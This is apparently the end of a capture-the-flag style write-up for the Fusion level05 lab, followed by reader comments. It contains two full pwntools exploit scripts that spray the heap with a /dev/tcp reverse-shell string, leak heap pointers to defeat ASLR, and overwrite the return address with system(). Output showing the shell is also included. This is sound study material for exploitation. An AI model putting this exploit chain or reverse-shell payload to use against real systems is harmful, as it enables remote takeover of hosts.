#!/usr/bin/env python3 from pwn import * import sys bad_chars = [b'\0', b'\x0a', b'\x0d', b'\x40'] def bad(addr): if any(bad in p32(addr) for bad in bad_chars): return True else: return False ################### SYSTEM = 0xb7750b20 STRING = 0xb87c9864 ################### if bad(SYSTEM): log.failure("The system() address contains a bad byte" "It is recommended to crash the program so you can start over.") log.warning("NOTE: You will need to spray the heap again") crash = input("Crash the program? [Y/n] ") if crash.lower() == "n": log.failure("Exiting") sys.exit(1) else: log.warning("OK, crashing the program") io.sendline(content + b"A"*12) sys.exit(1) content = b"checkname " content += b"A" * 44 content += p32(SYSTEM) content += b"A" * 4 content += p32(STRING) io = remote("fusion", 20005) log.info(io.recvline()) l = listen(1337) io.sendline(content) l.wait_for_connection() l.interactive()
andrew ~/level05 $ ./rshell.py [+] Opening connection to fusion on port 20005: Done [*] ** welcome to level05 ** [+] Trying to bind to :: on port 1337: Done [+] Waiting for connections on :::1337: Got connection from ::ffff:10.0.1.5 on port 55669 [*] Switching to interactive mode $ id uid=20005 gid=20005 groups=20005 $
Conclusion
Wow, this was a long one. I did my best to explain everything as much as possible. Of course, some prerequisite knowledge is still required. But if you, dear reader, feel like I did a poor job at explaining something, leave a comment. It is my goal here to provide the best write-up possible.
Here’s a quick TLDR on what we did:
- Spray the heap with a reverse shell string
- Need enough to ensure we can start guessing at addresses and hit our data
- This is only possible because the program does not properly free heap-allocated space
- Use the BOF vulnerability in the
get_and_hash()
function to find a valid file descriptor address in our data - Using the
checkname
command will call this function - We’ll know we’ve hit a valid file descriptor (
4
) when we get a response from the server - This causes an information leak vulnerability that allows us to read data from the heap
- The address pointing to the string returned to the client is right after the file descriptor on the stack
- We keep stepping back & reading data from the heap all the way to the beginning
- There’s pointers to several functions in the level05 binary near the beginning of the heap
- Leaking one of those addresses (
checkname()
is used here) allows us to defeat ASLR - Read the address to a Libc function from the .got.plt section
- The function used here is
write()
and it’s address is at a constant offset fromcheckname()
- Calculate the
system()
function address as it is a constant offset fromwrite()
- Utilize the BOF vulnerability to overwrite the saved EIP register with the address to
system()
- The next 4 bytes after that can be anything, however, it’s recommended to use the address to
exit()
- This prevents the program from causing a segfault when you quit the reverse shell
- The last 4 bytes are the address to our reverse shell string as an argument to
system()
One last thing to do is to put this all together into a single exploit script.
#!/usr/bin/env python3 from pwn import * import time import sys def connect(): io = remote("fusion", 20005) log.info(io.recvline()) return io ### HEAP SPRAY ################################################################# def spray(io): buff_sz = 504 command = b"isup " content = b"ABC " content += b"/bin/sh > /dev/tcp/10.0.1.4/1337 0>&1 2>&1; " # 44 bytes content += b"A" * (buff_sz - len(content)) content += pack(4) max_spray = 60222 with log.progress('Spraying') as p: for i in range(max_spray): io.send(command + content) p.status(f"{(i/max_spray):.2%}") time.sleep(0.005) io.close() print() ### LEAK FILE DESCRIPTOR ####################################################### CHECKNAME = b"checkname " CHECKNAME += b"A" * 32 def leak_fd(io): print() start_addr = 0xb9700108 log.info("Searching for a valid file descriptor...") for fd in range(start_addr, start_addr+528, 16): io.sendline(CHECKNAME + p32(fd)) data = io.recvline(timeout=0.1) if b"indexed already" in data: log.success(f"File descriptor address: {fd:#010x}") string = fd + 28 log.success(f"Reverse shell string at: {string:#010x}") break else: log.error("File descriptor address not found!") return fd, string ### FIND SYSTEM() ADDRESS ###################################################### def send(io, fd, read_ptr): payload = CHECKNAME payload += p32(fd) payload += p32(read_ptr) io.sendline(payload) return io.recvline(timeout=0.1) def crash(io): log.failure("It is recommended to crash the program so you can start over.") log.warning("NOTE: You will need to spray the heap again") resp = input("Crash the program? [Y/n] ") if resp.lower() == "n": log.failure("Exiting") sys.exit(1) else: log.warning("OK, crashing the program") io.sendline(CHECKNAME + b"A"*12) sys.exit(1) def bad(addr): bad_chars = [b'\0', b'\x0a', b'\x0d', b'\x40'] if any(bad in p32(addr) for bad in bad_chars): return True return False def find_system(io, fd): print() # Keep track of when the previous address contained a bad byte prev_bad = False align = 0x860 read = ((fd - align - 1) & 0xfffff000) + align log.info("Searching for system()...") while read > 0xb7000000: if bad(read): #log.failure(f"Bad byte found in address {read:#010x}") prev_bad = True read -= 0x1000 continue time.sleep(0.005) data = send(io, fd, read) if not data: log.error("No data received. Either the program crashed or you have a bad file descriptor address.") elif data[:3] == b"ABC": prev_inuse = send(io, fd, read - 24) if prev_inuse[:2] == b"\xa0\x83": # childtask() ptr offset from start of user-supplied heap = -136 bytes childtask_str = send(io, fd, read - 136) childtask = unpack(childtask_str[:4]) write_str = send(io, fd, childtask + 0x4538) write_addr = unpack(write_str[:4]) system = write_addr - 0x847a0 log.success(f"Address to childtask() stored at: {read-136:#010x}") log.success(f" Address to childtask(): {childtask:#010x}") log.success(f" The write@got.plt address: {childtask+0x4538:#010x}") log.success(f" The address to write() is: {write_addr:#010x}") log.success(f" The address to system() is: {system:#010x}") break elif data == b" is not indexed already\n" and prev_bad: log.failure(f"The last address read ({read+0x1000:#010x}) contained a bad byte and now we've hit a null region.\n" "The pointer to childtask() may be unreadable if its address has one or more bad bytes in it.") crash(io) elif data == b" is not indexed already\n" and not prev_bad: log.failure("We've hit a null region. Something went wrong.") log.info(f"Last address read: {read+0x1000:#010x}") sys.exit(1) read -= 0x1000 prev_bad = False else: log.error("Something went wrong. Unable to find pointer to childtask() in the heap.") return system ### GET REVERSE SHELL ########################################################## def rshell(io, system, string): print() if bad(system): log.failure("The system() address contains a bad byte") crash(io) EXIT = system - 0xa140 payload = CHECKNAME payload += b"A" * 12 payload += p32(system) payload += p32(EXIT) payload += p32(string) l = listen(1337) io.sendline(payload) l.wait_for_connection() l.interactive() if __name__ == "__main__": io = connect() spray(io) io = connect() fd, string = leak_fd(io) system = find_system(io, fd) rshell(io, system, string)
> The comma operator in the for loop says to keep looping whle i is less than maxsz OR while string[i] exists.
although it doesn’t matter for the exploitation, I Just wanted to correct this. the comma operator returns only the last value of the expression, so it will keep looping while string[i] exists, completely ignoring maxsz.
https://stackoverflow.com/questions/52550/what-does-the-comma-operator-do
other than that great article
Looking back on this with what I know now, you’re absolutely right. I’ll fix that.
Hey good solution! One question.
How come you don’t overwrite the address on the heap storing the address isup, when performing your spray?
Wouldn’t your ‘garbage’ data actually overwrite the contents of that address and thus when later reading the address containg “isup” it would return your garbage data?
best regards.
Love this breakdown. I’ll have to read this again. Really want to get to this level of pwn because its genuinely my favourite. What path to you recommend to learn on how to read ASM?
Personally, I read Assembly Language for X86 Processors, which is an excellent book. But there’s a LOT of resources out there.